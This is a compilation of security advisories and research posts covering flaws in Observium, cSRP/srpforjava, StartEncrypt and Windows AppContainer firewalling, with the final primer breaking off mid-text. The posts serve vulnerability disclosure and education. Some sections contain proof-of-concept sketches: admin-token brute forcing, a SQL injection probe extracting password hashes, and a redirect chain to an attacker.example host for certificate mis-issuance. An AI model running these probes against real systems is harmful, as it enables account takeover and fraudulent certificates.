Furthermore, the Ansible security team has been understanding and professional in their communication around this issue, which is a good sign for the handling of future issues.

Timeline

2016-12-08 First contact with Ansible security team
2016-12-09 First contact with Redhat security team ([email protected])
2016-12-09 Submitted PoC and description to [email protected]
2016-12-13 Ansible confirms issue and severity
2016-12-15 Ansible informs us of intent to disclose after holidays
2017-01-05 Ansible informs us of disclosure date and fix versions
2017-01-09 Ansible issues fixed versions

Observium - unauthenticated remote code execution

10 November 2016 at 00:00

During a recent penetration test Computest found and exploited various issues in Observium, going from unauthenticated user to full shell access as root. We reported these issues to the Observium project for the benefit of our customer and other members of the community.

This was not a full audit and further issues may or may not be present.

(Note about affected versions: The Observium project does not provide a way to download older releases for non-paying users, so there was no way to check whether these problems exist in older versions. All information given here applies to the latest Community Edition as of 2016-10-05.)

About Observium

“Observium is a low-maintenance auto-discovering network monitoring platform supporting a wide range of device types, platforms and operating systems including Cisco, Windows, Linux, HP, Juniper, Dell, FreeBSD, Brocade, Netscaler, NetApp and many more.” - observium.org

Issue #1: Deserialization of untrusted data

Observium uses the get_vars() function in various places to parse the user-supplied GET, POST and COOKIE values. This function will attempt to unserialize data from any of the requested fields using the PHP unserialize() function.

Deserialization of untrusted data is in general considered a very bad idea, but the practical impact of such issues can vary.

Various memory corruption issues have been identified in the PHP unserialize() function in the past, which can lead directly to remote code execution. On patched versions of PHP exploitability depends on the application.

In the case of Observium the issue can be exploited to write mostly user-controlled data to an arbitrary file, such as a PHP session file. Computest was able to exploit this issue to create a valid Observium admin session.

The function get_vars() eventually calls var_decode(), which unserializes the user input.

./includes/common.inc.php:

function var_decode($string, $method = 'serialize')
{
 $value = base64_decode($string, TRUE);
 if ($value === FALSE)
 {
   // This is not base64 string, return original var
   return $string;
 }

 switch ($method)
 {
   case 'json':
     if ($string === 'bnVsbA==') { return NULL; };
     $decoded = @json_decode($value, TRUE);
     if ($decoded !== NULL)
     {
       // JSON encoded string detected
       return $decoded;
     }
     break;
   default:
     if ($value === 'b:0;') { return FALSE; };
     $decoded = @unserialize($value);
     if ($decoded !== FALSE)
     {
       // Serialized encoded string detected
       return $decoded;
     }
 }
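
Any request variable whose value base64-decodes to valid PHP-serialized data is thus unserialized. A small sketch of crafting such a value (the payload here is just a harmless string; a real attack would encode a crafted object):

# 's:5:"admin";' is the PHP serialization of the string "admin";
# var_decode() will happily unserialize the base64-encoded form.
import base64

php_serialized = b's:5:"admin";'
print(base64.b64encode(php_serialized).decode())  # czo1OiJhZG1pbiI7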

Issue #2: Admins can inject shell commands, possibly as root

Admin users can change the path of various system utilities used by Observium. These paths are directly used as shell commands, and there is no restriction on their contents.

This is not considered a bug by the Observium project, as Admin users are considered to be trusted.

The Observium installation guide recommends running various Observium scripts from cron. The instructions given in the installation guide will result in these scripts being run as root, invoking the user-controllable shell commands as root.

Since this functionality resulted in an escalation of privilege from web application user to system root user it is included in this advisory despite the fact that it appears to involve no unintended behavior in Observium.

Even if the Observium system is not used for anything else, privileged users log into this system (and may reuse passwords elsewhere), and the system as a whole may have a privileged network position due to its use as a monitoring tool. Various other credentials (SNMP etc) may also be of interest to an attacker.

The function rrdtool_pipe_open() uses the Admin-supplied config variable to build and run a command:

./includes/rrdtool.inc.php:

function rrdtool_pipe_open(&$rrd_process, &$rrd_pipes)
{
 global $config;

 $command = $config['rrdtool'] . " -"; // Waits for input via standard input (STDIN)

 $descriptorspec = array(
    0 => array("pipe", "r"),  // stdin
    1 => array("pipe", "w"),  // stdout
    2 => array("pipe", "w")   // stderr
 );

 $cwd = $config['rrd_dir'];
 $env = array();

 $rrd_process = proc_open($command, $descriptorspec, $rrd_pipes, $cwd, $env);

Issue #3: Incorrect use of cryptography in event feed authentication

Observium contains an RSS event feed functionality. Users can generate an RSS URL that displays the events that they have access to.

Since RSS viewers may not have access to the user’s session cookies, the user is authenticated with a user-specific token in the feed URL.

This token consists of encrypted data, and the integrity of this data is not verified. This allows a user to inject essentially random data that the Observium code will treat as trusted.

By sending arbitrary random tokens a user has at least a 1/65536 chance of viewing the feed with full admin permissions, since admin privileges are granted if the decryption of this random token happens to start with the two-character string 1| (1 being the user id of the admin account).

In general a brute force attack will gain access to the feed with admin privileges in about half an hour.

./html/feed.php:

if (isset($_GET['hash']) && is_numeric($_GET['id']))
{
 $key = get_user_pref($_GET['id'], 'atom_key');
 $data = explode('|', decrypt($_GET['hash'], $key)); // user_id|user_level|auth_mechanism

 $user_id    = $data[0];
 $user_level = $data[1]; // FIXME, need new way for check userlevel, because it can be changed
 if (count($data) == 3)
 {
   $check_auth_mechanism = $config['auth_mechanism'] == $data[2];
 } else {
   $check_auth_mechanism = TRUE; // Old way
 }

 if ($user_id == $_GET['id'] && $check_auth_mechanism)
 {
   session_start();
   $_SESSION['user_id']   = $user_id;
   $_SESSION['userlevel'] = $user_level;

(Note: this session is destroyed at the end of the page)
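
A hypothetical brute-force sketch of this attack; the endpoint path, token format and success check are assumptions on our part, but the loop is exactly the strategy described above: throw random tokens at the feed until one happens to decrypt to a value starting with 1|.

# Each random token has roughly a 1/65536 chance of decrypting to a value
# that starts with "1|", which satisfies the check for the admin user id.
import os, base64, requests  # pip install requests

url = "http://observium.example/feed.php"   # assumed endpoint
while True:
    token = base64.urlsafe_b64encode(os.urandom(32)).decode()
    r = requests.get(url, params={"id": "1", "hash": token})
    if "<entry>" in r.text:  # assumed heuristic: a valid session renders events
        print("admin feed token:", token)
        break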

Issue #4: Authenticated SQL injection

One of the graphs supported by Observium contains a SQL injection problem. This code is only reachable if unauthenticated users are permitted to view this graph, or if the user is authenticated.

The problem lies in the port_mac_acc_total graph.

When the stat parameter is set to a non-empty value that is not bits or pkts the sort parameter will be used in a SQL statement without escaping or validation.

The id parameter can be set to an arbitrary numeric value; the SQL is executed regardless of whether this is a valid identifier.

This can be exploited to leak various configuration details including the password hashes of Observium users.

./html/includes/graphs/port/mac_acc_total.inc.php:

$port      = (int)$_GET['id'];
if ($_GET['stat']) { $stat      = $_GET['stat']; } else { $stat = "bits"; }
$sort      = $_GET['sort'];

if (is_numeric($_GET['topn'])) { $topn = $_GET['topn']; } else { $topn = '10'; }

include_once($config['html_dir']."/includes/graphs/common.inc.php");

if ($stat == "pkts")
{
 $units='pps'; $unit = 'p'; $multiplier = '1';
 $colours_in  = 'purples';
 $colours_out = 'oranges';
 $prefix = "P";
 if ($sort == "in")
 {
   $sort = "pkts_input_rate";
 } elseif ($sort == "out") {
   $sort = "pkts_output_rate";
 } else {
   $sort = "bps";
 }
} elseif ($stat == "bits") {
 $units='bps'; $unit='B'; $multiplier='8';
 $colours_in  = 'greens';
 $colours_out = 'blues';
 if ($sort == "in")
 {
    $sort = "bytes_input_rate";
 } elseif ($sort == "out") {
    $sort = "bytes_output_rate";
 } else {
   $sort = "bps";
 }
}

$mas = dbFetchRows("SELECT *, (bytes_input_rate + bytes_output_rate) AS bps,
       (pkts_input_rate + pkts_output_rate) AS pps
       FROM `mac_accounting`
       LEFT JOIN  `mac_accounting-state` ON  `mac_accounting`.ma_id =  `mac_accounting-state`.ma_id
       WHERE `mac_accounting`.port_id = ?
       ORDER BY $sort DESC LIMIT 0," . $topn, array($port));
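
A hypothetical boolean-based probe of this injection point; the endpoint and the users table/column names are assumptions on our part, but the key observation stands: anything in sort ends up verbatim in the ORDER BY clause when stat is neither "bits" nor "pkts".

# The CASE expression changes the sort order depending on an arbitrary
# subquery, so the rendered graph reveals whether the condition held.
import requests  # pip install requests

inj = ("(CASE WHEN (SELECT ASCII(SUBSTRING(password,1,1)) FROM users LIMIT 1) "
       "> 77 THEN bps ELSE pps END)")
r = requests.get("http://observium.example/graph.php",  # assumed endpoint
                 params={"type": "port_mac_acc_total", "id": "1",
                         "stat": "x", "sort": inj, "topn": "10"},
                 cookies={"PHPSESSID": "..."})  # assumed session cookie name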

Mitigation

The Observium web application can be placed behind a firewall or protected with an additional layer of authentication. Even then, admin users should be treated with care as they are able to execute commands (probably as root) until the issues are patched.

The various cron jobs needed by Observium can be run as the website user (e.g. www-data) or a user created specifically for that purpose instead of as root.

Resolution

Observium has released a new Community Edition to resolve these issues.

The Observium project does not provide changelogs or version numbers for community releases.

Timeline

2016-09-01 Issue discovered during penetration test
2016-10-21 Vendor contacted
2016-10-21 Vendor responds that they are working on a fix
2016-10-26 Vendor publishes new version on website
2016-10-28 Vendor asks Computest to comment on changes
2016-10-31 Computest responds with quick review of changes
2016-11-10 Advisory published

cSRP/srpforjava - obtaining of hashed passwords

18 August 2016 at 00:00

In this blog we’ll look at an interesting vulnerability in some implementations of a widely used authentication protocol; Secure Remote Password (SRP). We’ll dive into the cryptography details to see what implications a little mathematical oversight has for the security of the whole protocol.

This vulnerability was discovered while evaluating some different implementations of the SRP 6a protocol.

The problem was initially identified in cSRP (which also affects PySRP if using the C module for acceleration), and was also found in srpforjava. It’s not clear how many users these projects have, but regardless the bug is interesting enough to discuss by itself.

SRP: What is it good for?

SRP is a popular choice for linking devices or apps to a master server using a short password or pin code. It is often used for authentication that involves a password, for instance in mobile banking apps (like the ING mobile banking app in the Netherlands), but also in Steam.

Quote from http://srp.stanford.edu/: “The Secure Remote Password protocol performs secure remote authentication of short human-memorizable passwords and resists both passive and active network attacks.”

In other words, being able to read and mess with network traffic of a legitimate client does not help an attacker log in. The fastest way to break in is to just try every possible password. The server can prevent this using rate limiting or by locking accounts.

SRP in three steps

The protocol consists of three stages:

  1. Client and server exchange public ephemeral values.
  2. Client and server calculate the session key.
  3. Client and server prove to each other that they know the session key. This can optionally be integrated with the normal communication that happens after authentication.

For the purpose of this blog only the first part of the protocol is relevant. In this stage the client sends its ephemeral value along with a username, and the server responds with its own ephemeral value and the random salt value for the given user.

How SRP checks your password

In the first part of the protocol the client and server exchange “ephemeral values”, which are large numbers calculated according to the SRP protocol. These values actually play multiple roles at once in the SRP protocol. This is how it performs authentication and establishes a shared session key in just one round trip!

The first role is as a kind of key exchange in a way that is similar to how Diffie-Hellman key exchange works. In Diffie-Hellman both parties generate a random number r which is their private value, and use this to generate a public value using the formula (g ** r) % N, where g and N are public fixed parameters. In SRP the client generates its public value in exactly this way, but the server does something slightly different.

In SRP the Diffie-Hellman key exchange is altered to additionally force the client to prove that it knows the password for a certain user. One way to think of this is that the server alters its public value based on the password for the given user, and the client needs to compensate for this alteration in order to derive the same session key as the server. The client can only perform this compensation if it knows the password.

In order to perform this calculation the server uses a “verifier” value for the desired user. In many ways a verifier is like a password hash. It is only derived from the username, the password, and the salt. Since the username and salt are stored in plain text on the server and are sent in plain text over the network, the password is the only unknown part and an attacker can generate verifiers for every possible password until he finds a match. Since a verifier is generated using only a single hash operation and a modular exponentiation in most SRP implementations, it is fairly easy to brute force compared to modern password hashing methods like scrypt.

One other way this “verifier” value is like a password hash is that it's not sent over the network, and even if it is stolen from the server, a hacker can't use it to log in directly. Because of how it's generated the server can use it to calculate its public ephemeral value, but a client can't use it to calculate the session key. A client needs the actual password for that.
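
For reference, a typical SRP-6a verifier calculation looks roughly like the sketch below. The exact hash construction varies between implementations and isn't spelled out in this post, so treat the details as an assumption:

import hashlib

def make_verifier(username: bytes, password: bytes, salt: bytes, g: int, N: int) -> int:
    # SRP-6a style: x = H(salt || H(username ":" password)), v = (g ** x) % N.
    inner = hashlib.sha256(username + b":" + password).digest()
    x = int.from_bytes(hashlib.sha256(salt + inner).digest(), "big")
    return pow(g, x, N)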

How the hacker gets your password: the bug

Warning: math ahead! It helps if you understand some algebra, but hopefully it’s not required.

Now we come to the actual bug, which is in the calculation of the server’s public ephemeral value. This is the formula to calculate this value:

B = (k * v + ((g ** b) % N)) % N

The ((g ** b) % N) part is just the standard Diffie-Hellman calculation of a public value from the private random value b. The values g and N are the public Diffie-Hellman parameters.

The addition of k * v is the extra adjustment for authentication in the SRP protocol. The value k is calculated by hashing the (public) g and N values (so k is also public), while v is the verifier for the user that is logging in.

In the buggy implementations, the actual calculation for B is slightly different:

B' = k * v + ((g ** b) % N)

In other words, the final reduction modulo N is missing. As it turns out, that is actually very important! Because B has this final modulo operation, the public Diffie-Hellman value and the value derived from the verifier are hopelessly mixed up, and we can’t separate the two at all anymore.

But what about B'? Well, we can divide it by k.

B' / k = (k * v + ((g ** b) % N)) / k

Let’s define i and j as the unknown quotient and remainder of dividing the public Diffie-Hellman value ((g ** b) % N) by k:

((g ** b) % N) = k * i + j
B' / k = (k * v + (k * i + j)) / k

By definition j is smaller than k so we disregard it:

B' / k = (k * v + k * i) / k
B' / k = v + i

Let's write |B| for the (approximate) length of B in bits. I'm going to ask you to just take my word for it that values that came from a modular exponentiation ((g ** x) % N) (like v) are about as long as N (say 2048 bits), and values resulting from a hash (like k) are about as long as the hash function's output (say 256 bits).

Now we know these things about the lengths of v and i:

|v| ~= |N|
|i| ~= |N| - |k|

In words: v is 2048 bits, while i is (2048 – 256) bits long. So the value i is about 256 bits shorter than v.

Take a look at B' / k again with that in mind:

B' / k = v + i

This means that the top 256 bits of B’ / k are equal to the top 256 bits of the verifier v! In other words, the server leaks the top 256 bits of the verifier.

What is that good for? Well, the odds of two different verifiers having the same top 256 bits are impossibly small. This means that these top 256 bits are enough to check whether two verifiers are equal, which means we can perform offline password cracking using this leaked part of the verifier.

Note that all bit lengths are approximate, and in any case the values 2048 and 256 depend on the Diffie-Hellman parameters and hash function used.
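
You can check the leak numerically. The following self-contained Python sketch uses stand-in values with realistic bit lengths; no real prime group is needed, since only the relative sizes of the values matter here:

import hashlib
import secrets

BITS_N, BITS_K = 2048, 256

N = secrets.randbits(BITS_N) | (1 << (BITS_N - 1)) | 1  # odd full-length stand-in
g = 2
k = int.from_bytes(hashlib.sha256(b"stand-in for H(N, g)").digest(), "big")

v = pow(g, secrets.randbelow(N), N)  # verifier-like value, |v| ~= |N|
b = secrets.randbelow(N)             # server's private ephemeral value

B_buggy = k * v + pow(g, b, N)       # the buggy calculation: no final % N

# (k * v + u) // k == v + u // k, and u // k is roughly |k| bits shorter
# than v, so the top bits of the quotient equal the top bits of the verifier.
shift = BITS_N - BITS_K + 16         # slack for carries and a small k
print((B_buggy // k) >> shift == v >> shift)  # True (with overwhelming odds)

An attacker who captures B' can therefore compute candidate verifiers for a password list and compare the top bits until one matches.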

In short

Because of this bug the server will send a value equivalent to a password hash to any client that wants to log in. This can then be cracked offline, which totally breaks the guarantees of the SRP protocol.

The fix

Tom Cocagne, the maintainer of cSRP, was very quick to fix the affected code after we reported the bug. The fix is to perform the missing modulo operation.

The author of srpforjava was contacted later, after we discovered that this library was also affected. We've sent a patch, but it has not been applied yet.

Neither library has had a new release in a long time, and it's difficult to determine who's using them. Hopefully this blog post will reach them.

Because the client performs all operations modulo N, the fact that the server now returns different B values does not affect the normal operation of the protocol at all. Clients are compatible with both the patched and unpatched server.
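
A tiny illustration of why, using arbitrary small stand-in numbers:

N, k, v, b, g = 1009, 37, 613, 5, 2  # small stand-ins for illustration
B_buggy = k * v + pow(g, b, N)       # unpatched server: no final % N
B_fixed = B_buggy % N                # patched server
# Anything the client computes modulo N is unaffected by the fix:
assert (B_buggy - k * v) % N == (B_fixed - k * v) % N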

Do not try this at home

This article tries to explain SRP in a simplified way. Please do not go and implement SRP yourself. In fact, please do not implement any cryptography code unless you are an expert! When it comes to cryptography, every detail matters. Even the ones the textbook doesn’t mention.

StartEncrypt - obtaining valid SSL certificates for unauthorized domains

30 June 2016 at 00:00

Recently, we found a critical vulnerability in StartCom’s new StartEncrypt tool, that allows an attacker to gain valid SSL certificates for domains he does not control. While there are some restrictions on what domains the attack can be applied to, domains where the attack will work include google.com, facebook.com, live.com, dropbox.com and others.

StartCom, known for its CA service under the name of StartSSL, has recently released the StartEncrypt tool. Modeled after LetsEncrypt, this service allows for the easy and free installation of SSL certificates on servers. In the current age of surveillance and cybercrime, this is a great step forward, since it enables website owners to provide their visitors with better security at small effort and no cost.

However, there is a lot that can go wrong with the automated issuance of SSL certificates. Before someone is issued a certificate for their domain, say computest.nl, the CA needs to check that the request is done by someone who is actually in control of the domain. For “Extended Validation” certificates this involves a lot of paperwork and manual checking, but for simple, so-called “Domain Validated” certificates, often an automated check is used by sending an email to the domain or asking the user to upload a file. The CA has a lot of freedom in how the check is performed, but ultimately, the requester is provided with a certificate that provides the same security no matter which CA issued it.

StartEncrypt

So, StartEncrypt. In order to make the issuance of certificates easy, this tool runs on your server (Windows or Linux), detects your webserver configuration, and requests DV certificates for the domains that were found in your config. Then, the StartCom API does an HTTP request to the website at the domain you requested a certificate for, and checks for the presence of a piece of proof that you have access to that website. If the proof is found, the API returns a certificate to the client, which then installs it in your config.

However, it appears that the StartEncrypt tool did not receive proper attention from security-minded people in the design and implementation phases. While the client contains numerous vulnerabilities, one in particular allows the attacker to “trick” the validation step.

The first bug

The API checks if a user is authorized to obtain a certificate for a domain by downloading a signature from that domain, by default from the path /signfile. However, the client chooses that path during an HTTP POST request to that API.

A malicious client can specify a path to any file on the server for which a certificate is requested. This means that, for example, anyone can obtain a certificate for sites like dropbox.com and github.com where users can upload their own files.

That’s not all

While this is serious, most websites don't allow you to upload a file and then have it presented back to you in raw format like github and dropbox do. Another issue in the API, however, allows for much wider exploitation: the API follows redirects. So, if the URL specified in the “verifyRes” parameter returns a redirect to another URL, the API will follow that until it gets to the proof, even if the redirect goes off-domain. Since the first redirect was to the domain that is being verified, the API considers the proof correct even if it is redirected to a different website.

This means that an attacker can obtain an SSL certificate for any website that either:

  • Allows users to upload files and serves them back raw, or
  • Has an “open redirect” vulnerability/feature in it

Open redirects are pages that take a parameter that contains a URL, and redirect the user to it. This seems like a strange feature, but this mechanism is often implemented for instance in logout or login pages. After a successful logout, you will be redirected to some other page. That other page URL is included as a parameter to the logout page. For instance, http://mywebsite/logout?returnURL=/login might redirect you to /login after logout.

While many see open redirects as a vulnerability that needs fixing, others do not. Google for instance has excluded open redirects from their vulnerability reward program. By itself an open redirect is not exploitable, so it is understandable that many do not see it as a security issue. However, when combined with a vulnerability like the one present in StartEncrypt, the open redirect suddenly has great impact.

It’s actually even worse: the OAuth 2.0 specification practically mandates that an open redirect must be present in each implementation of the spec. For this reason, login.live.com and graph.facebook.com for instance contain open redirects.

When combining the path-bug with the open redirect, suddenly many more certificates can be obtained, like for google.com, paypal.com, linkedin.com, login.live.com and all those other websites with open redirects. While not every website has an open redirect feature, many do at some point in time.
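
As a purely hypothetical sketch of how the chain fits together (the endpoint URL and parameter set here are made up; only the “verifyRes” parameter and the redirect-following behaviour come from the description above):

import requests  # third-party HTTP client

API = "https://api.invalid/startencrypt/verify"  # placeholder, not the real endpoint

# The client-controlled "verifyRes" path points at an open redirect on the
# victim domain, which bounces the API's validation request to a file the
# attacker controls on a completely different host.
requests.post(API, data={
    "domain": "victim.example",
    "verifyRes": "/logout?returnURL=https://attacker.example/signfile",
})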

That’s still not all

Apart from the vulnerability described above, we found some other vulnerabilities in the client while doing just a cursory check. We are only publishing those that according to StartCom have been fixed or are no issue. These include:

  • The client doesn’t check the server’s certificate for validity when connecting to the API, which is pretty ironic for an SSL tool.
  • The API doesn’t verify the content-type of the file it downloads for verification, so attackers can obtain certificates for any website where users can upload their own avatars (in combination with the above vulnerabilities of course)
  • The API only involves the server obtaining the raw RSA signature of a nonce. The signature file doesn't identify either the key or the nonce that was used. This opens up the possibility of a “Duplicate-Signature Key Selection” attack, just like the one Andrew Ayer discovered in the ACME protocol while LetsEncrypt was in beta, see also this post. As long as a signfile is hosted on a domain, an attacker can obtain that signfile, start a new authorization to obtain a nonce, and then pick their RSA key in such a way that the existing signature verifies against their nonce.
  • The private key on the server (/usr/local/StartEncrypt/conf/cert/tokenpri.key) is saved with mode 0666, so world-readable, which means any local user can read or modify it.

All in all, it doesn’t seem like a lot of attention was paid to security in the design and implementation of this piece of software.

Disclosure

As a security company, we constantly do security research. Usually for paying customers. In this case however, we started looking at StartEncrypt out of interest and because of the high impact any issues would have for the internet as a whole. That is also why we are disclosing this issue: we believe that CAs need to become much more aware of the vital role they play in internet security and need to start taking their software security more seriously.

Of course, we disclosed the issue to StartCom prior to publishing. The vulnerabilities we described were found in the Linux x86_64 binary version 1.0.0.1. The timeline:

June 22, 2016: issue discovered
June 23, 2016: issue disclosed to StartCom after obtaining email address by phone
June 23, 2016: StartCom takes API offline
June 28, 2016: StartCom takes API online again, incompatible with current client
June 28, 2016: StartCom updates the Windows-client on the download page
June 29, 2016: StartCom updates the Linux-client on the download page, keeping the version number at 1.0.0.1
June 30, 2016: StartCom informs Computest of which issues have been fixed

Conclusion

StartCom launched a tool that makes it easier to secure communications on the internet, which is something we applaud. In doing so however, they seem to have taken some shortcuts in engineering. Using their tool, an attacker is able to obtain certificates for other domains like google.com, linkedin.com, login.live.com and dropbox.com.

In our opinion, StartCom made a mistake by publishing StartEncrypt the way it is. Although they appreciated the issues for the impact they had and were swift in their response, it is apparent that too little attention was paid to security both in design (allowing the user to specify the path) and implementation (for instance in following redirects, static linking against a vulnerable library, and so on). Furthermore, they didn’t learn from the issues LetsEncrypt faced when in beta.

But the issue is broader. As users of the internet, we trust the CAs to provide us with a base for trust upon which we do business and share our lives online. When a single CA publishes software with this level of security, the trust in the CA system as a whole is undermined.

Understanding Network Access in Windows AppContainers

By: Ryan
19 August 2021 at 16:37

Posted by James Forshaw, Project Zero

Recently I've been delving into the inner workings of the Windows Firewall. This is interesting to me as it's used to enforce various restrictions such as whether AppContainer sandboxed applications can access the network. Being able to bypass network restrictions in AppContainer sandboxes is interesting as it expands the attack surface available to the application, such as being able to access services on localhost, as well as granting access to intranet resources in an Enterprise.

I recently discovered a configuration issue with the Windows Firewall which allowed the restrictions to be bypassed and allowed an AppContainer process to access the network. Unfortunately Microsoft decided it didn't meet the bar for a security bulletin so it's marked as WontFix.

As the mechanism that the Windows Firewall uses to restrict access to the network from an AppContainer isn't officially documented as far as I know, I'll provide the details on how the restrictions are implemented. This will provide the background to understanding why my configuration issue allowed for network access.

I'll also take the opportunity to give an overview of how the Windows Firewall functions and how you can use some of my tooling to inspect the current firewall configuration. This will provide security researchers with the information they need to better understand the firewall and assess its configuration to find other security issues similar to the one I reported. At the same time I'll note some interesting quirks in the implementation which you might find useful.

Windows Firewall Architecture Primer

Before we can understand how network access is controlled in an AppContainer we need to understand how the built-in Windows firewall functions. Prior to XP SP2 Windows didn't have a built-in firewall, and you would typically install a third-party firewall such as ZoneAlarm. These firewalls were implemented by hooking into Network Driver Interface Specification (NDIS) drivers or implementing user-mode Winsock Service Providers but this was complex and error prone.

While XP SP2 introduced the built-in firewall, the basis for the one used in modern versions of Windows was introduced in Vista as the Windows Filtering Platform (WFP). However, as a user you wouldn't typically interact directly with WFP. Instead you'd use a firewall product which exposes a user interface, and then configures WFP to do the actual firewalling. On a default installation of Windows this would be the Windows Defender Firewall. If you installed a third-party firewall this would replace the Defender component but the actual firewall would still be implemented through configuring WFP.

Architectural diagram of the built-in Windows Firewall. Showing a separation between user components (MPSSVC, BFE) and the kernel components (AFD, TCP/IP, NETIO and Callout Drivers)

The diagram gives an overview of how various components in the OS are connected together to implement the firewall. A user would interact with the Windows Defender firewall using the GUI, or a command line interface such as PowerShell's NetSecurity module. This interface communicates with the Windows Defender Firewall Service (MPSSVC) over RPC to query and modify the firewall rules.

MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS) in the kernel which is where the firewall processing is handled. The device objects (such as \Device\WFP) which the TCP/IP driver exposes are secured so that only the BFE service can access them. This means all access to the kernel firewall needs to be mediated through the service.

When an application, such as a Web Browser, creates a new network socket the AFD driver responsible for managing sockets will communicate with the TCP/IP driver to configure the socket for IP. At this point the TCP/IP driver will capture the security context of the creating process and store that for later use by the firewall. When an operation is performed on the socket, such as making or accepting a new connection, the firewall filters will be evaluated.

The evaluation is handled primarily by the NETIO driver as well as registered callout drivers. These callout drivers allow for more complex firewall rules to be implemented as well as inspecting and modifying network traffic. The drivers can also forward checks to user-mode services. As an example, the ability to forward checks to user mode allows the Windows Defender Firewall to display a UI when an unknown application listens on a wildcard address, as shown below.

Dialog displayed by the Windows Firewall service when an unknown application tries to listen for incoming connections.

The end result of the evaluation is whether the operation is permitted or blocked. The behavior of a block depends on the operation. If an outbound connection is blocked the caller is notified. If an inbound connection is blocked the firewall will drop the packets and provide no notification to the peer, such as a TCP Reset or ICMP response. This default drop behavior can be changed through a system wide configuration change. Let's dig into more detail on how the rules are configured for evaluation.

Layers, Sublayers and Filters

The firewall rules are configured using three types of object: layers, sublayers and filters as shown in the following diagram.

Diagram showing the relationship between layers, sublayers and filters. Each layer can have one or more sublayers which in turn has one or more associated filters.

The firewall layer is used to categorize the network operation to be evaluated. For example there are separate layers for inbound and outbound packets. This is typically further differentiated by IP version, so there are separate IPv4 and IPv6 layers for inbound and outbound packets. While the firewall is primarily focussed on IP traffic, there do exist limited MAC and Virtual Switch layers to perform specialist firewalling operations. You can find the list of pre-defined layers on MSDN here. As WFP needs to know which layer handles which operation, there's no way for additional layers to be added to the system by a third-party application.

When a packet is evaluated by a layer the WFP performs Filter Arbitration. This is a set of rules which determine the order of evaluation of the filters. First WFP enumerates all registered filters which are associated with the layer's unique GUID. Next, WFP groups the filters by their sublayer's GUID and orders the filter groupings by a weight value which was specified when the sublayer was registered. Finally, WFP evaluates each filter according to the order based on a weight value specified when the filter was registered.

For every filter, WFP checks if the list of conditions match the packet and its associated meta-data. If the conditions match then the filter performs a specified action, which can be one of the following:

  • Permit
  • Block
  • Callout Terminating
  • Callout Unknown
  • Callout Inspection

If the action is Permit or Block then the filter evaluation for the current sublayer is terminated with that action as the result. If the action is a callout then WFP will invoke the filter's registered callout driver's classify function to perform additional checks. The classify function can evaluate the packet and its meta-data and specify a final result of Permit, Block or additionally Continue which indicates the filter should be ignored. In general if the action is Callout Terminating then it should only set Permit and Block, and if it's Callout Inspection then it should only set Continue. The Callout Unknown action is for callouts which might terminate or might not depending on the result of the classification.

Once a terminating filter has been evaluated WFP stops processing that sublayer. However, WFP will continue to process the remaining sublayers in the same way regardless of the final result. In general if any sublayer returns a Block result then the packet will be blocked, otherwise it'll be permitted. This means that if a higher priority sublayer's result is Permit, it can still be blocked by a lower-priority sublayer.

A filter can be configured with the FWPM_FILTER_FLAG_CLEAR_ACTION_RIGHT flag which indicates that the result should be considered “hard”, allowing a higher priority filter to permit a packet in a way that can't be overridden by a lower-priority blocking filter. The rules for the final result are even more complex than I make out, including soft blocks and vetoes; refer to the page in MSDN for more information.
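
To summarize the arbitration rules, here is a simplified model in Python. It ignores callouts, vetoes and the “hard” action rights, but captures the ordering and the way sublayer results combine:

from dataclasses import dataclass, field

@dataclass
class Filter:
    weight: int
    action: str  # "permit" or "block"
    conditions: list = field(default_factory=list)  # callables: packet -> bool

    def matches(self, packet) -> bool:
        return all(cond(packet) for cond in self.conditions)

def classify(sublayers, packet) -> str:
    """sublayers: list of (sublayer_weight, [Filter, ...]) tuples."""
    result = "permit"
    for _, filters in sorted(sublayers, key=lambda s: -s[0]):
        for f in sorted(filters, key=lambda f: -f.weight):
            if f.matches(packet):
                if f.action == "block":
                    result = "block"  # a block from any sublayer wins
                break                 # terminating action ends this sublayer
    return result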


To simplify the classification of network traffic, WFP provides a set of stateful layers which correspond to major network events such as TCP connection and port binding. The stateful filtering is referred to as Application Layer Enforcement (ALE). For example the FWPM_LAYER_ALE_AUTH_CONNECT_V4 layer will be evaluated when a TCP connection using IPv4 is being made.

For any given connection it will only be evaluated once, not for every packet associated with the TCP connection handshake. In general these ALE layers are the ones we'll focus on when inspecting the firewall configuration, as they're the most commonly used. The three main ALE layers you're going to need to inspect are the following:

  • FWPM_LAYER_ALE_AUTH_CONNECT_V4/6: Processed when TCP connect() is called.
  • FWPM_LAYER_ALE_AUTH_LISTEN_V4/6: Processed when TCP listen() is called.
  • FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4/6: Processed when a packet/connection is received.

What layers are used and in what order they are evaluated depend on the specific operation being performed. You can find the list of the layers for TCP packets here and UDP packets here. Now, let's dig into how filter conditions are defined and what information they can check.

Filter Conditions

Each filter contains an optional list of conditions which are used to match a packet. If no list is specified then the filter will always match any incoming packet and perform its defined action. If more than one condition is specified then the filter is only matched if all of the conditions match. If you have multiple conditions of the same type they're OR'ed together, which allows a single filter to match on multiple values.

Each condition contains three values:

  • The layer field to check.
  • The value to compare against.
  • The match type, for example the packet value and the condition value are equal.

Each layer has a list of fields that will be populated whenever a filter's conditions are checked. The field might directly reflect a value from the packet, such as the destination IP address or the interface the packet is traversing. Or it could be a metadata value, such as the user identity of the process which created the socket. Some common fields are as follows:

  • FWPM_CONDITION_IP_REMOTE_ADDRESS: The remote IP address.
  • FWPM_CONDITION_IP_LOCAL_ADDRESS: The local IP address.
  • FWPM_CONDITION_IP_PROTOCOL: The IP protocol type, e.g. TCP or UDP.
  • FWPM_CONDITION_IP_REMOTE_PORT: The remote protocol port.
  • FWPM_CONDITION_IP_LOCAL_PORT: The local protocol port.
  • FWPM_CONDITION_ALE_USER_ID: The user's identity.
  • FWPM_CONDITION_ALE_REMOTE_USER_ID: The remote user's identity.
  • FWPM_CONDITION_ALE_APP_ID: The path to the socket's executable.
  • FWPM_CONDITION_ALE_PACKAGE_ID: The user's AppContainer package SID.
  • FWPM_CONDITION_FLAGS: A set of additional flags.
  • FWPM_CONDITION_ORIGINAL_PROFILE_ID: The source network interface profile.
  • FWPM_CONDITION_CURRENT_PROFILE_ID: The current network interface profile.

The value to compare against the field can take different values depending on the field being checked. For example the field FWPM_CONDITION_IP_REMOTE_ADDRESS can be compared to IPv4 or IPv6 addresses depending on the layer it's used in. The value can also be a range, allowing a filter to match on an IP address within a bounded set of addresses.

